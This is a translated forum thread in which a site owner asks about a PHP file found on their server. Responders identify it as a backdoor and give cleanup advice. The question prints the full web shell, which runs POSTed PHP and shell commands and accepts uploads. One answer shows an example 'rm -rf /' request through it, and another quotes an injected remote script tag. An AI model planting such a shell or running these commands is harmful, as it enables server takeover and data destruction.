这个 PHP 代码/hack 的目的是什么？

Question

我最近在我的服务器上发现了 4 个奇怪的文件（我没有上传）。文件名是这样的：goog1e7a20543b128921.php

这是其中的代码：

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

你知道这段代码应该做什么......吗？ 我应该开始恐慌吗..？

谢谢。

Answer 1

是的，这是恶意代码。 如果攻击者知道传递给它的参数，这个 shell 脚本将允许执行代码以及上传任何文件。 我建议在所有文件中搜索该代码，验证文件权限并更改密码以防万一。

Answer 2

应对攻击的建议

我建议您使用HTML Purifier 或OWASP 来确保安全。

如果您不使用 eval 构造，您必须禁用它（除非确实需要，否则不应该这样做）。

分析任何安全漏洞的服务器设置：

PHPSecInfo

_{（来源：phpsec.org）}

Answer 3

删除它们正确现在！

这是您网络服务器的后门。
它允许攻击者向http://you.com/goog1e7a20543b128921.php?s=rm -rf / 发送请求以删除您的整个系统。

然后，您应该对您的网站进行彻底的安全审查，以确定他们最初是如何到达那里的。

Answer 4

供参考：

if($e){eval($e);}

这允许攻击者执行他们想要的任何 PHP 命令。

if($s){system($s);}

这允许攻击者执行他们想要的任何系统命令，就像你的网络服务器运行的任何用户一样。

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

这允许攻击者上传他们想要的任何文件 - 再次由您的网络服务器运行的用户决定文件权限。

总之，恐慌：-p

我相信网上有很多关于如何处理这个问题的文章。简而言之，备份您的系统以便稍后进行分析，从头开始重新安装服务器（您不知道他们还对您做了什么，所以仅仅删除文件是不够的。）同时试图弄清楚它们是如何进入的堵住这个洞。

Answer 5

eval($e) - 远程执行命令 系统 - eq。对于listind目录 $_FILES['f']['name'] - 用于将脚本上传到服务器 eq hack 工具等

Answer 6

显然你不是唯一拥有这些的人。谷歌搜索它真的很快，其他网站似乎也被感染了。看起来受感染的文件总是将自己存储在 images 文件夹中。

Answer 7

相关：尝试安装 phpAntiVirus 以备将来使用，并向您的提供商询问 mod_security。这可能会减轻未来的黑客攻击。无论如何，这些文件并没有在您的服务器上全部实现。摆脱所有旧的 PHP 应用程序。

Answer 8

在每个文件中查找它。 <script src="http://nt02.co.in/3"></script> 如果你找到一个使用你的 ftp 的文件，请查看文件的修改日期并打开该日期修改的所有文件并将其删除。